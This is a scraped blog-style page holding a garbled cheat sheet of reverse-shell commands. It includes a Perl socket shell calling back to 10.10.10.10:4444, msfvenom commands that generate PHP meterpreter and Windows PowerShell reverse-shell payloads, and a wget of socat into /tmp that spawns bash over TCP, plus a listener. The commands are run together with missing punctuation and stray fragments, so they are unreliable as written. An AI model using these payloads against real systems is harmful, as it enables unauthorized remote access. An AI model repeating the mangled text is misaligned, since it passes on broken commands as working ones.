![]() ![]() ![]() Windows reverse shell embedded into plink. Perl -e 'use Socket $i="10.10.10.10" $p=4444 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) p.destroy() s. Reverse Shell with Msfvenom - Cheatsheet List payloads msfvenom -l Or msfvenom -list payloads Generate a PHP payload msfvenom -p php/meterpreter/reversetcp LHOST LPORT -f raw > shell. msfvenom -p cmd/windows/reversepowershell lhost10.10.12.15 lport4444 > shell.bat.Wget -q -O /tmp/socat chmod +x /tmp/socat /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444 Copy Perl: Socat file:`tty`,raw,echo=0 TCP-L:4444 Copy ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |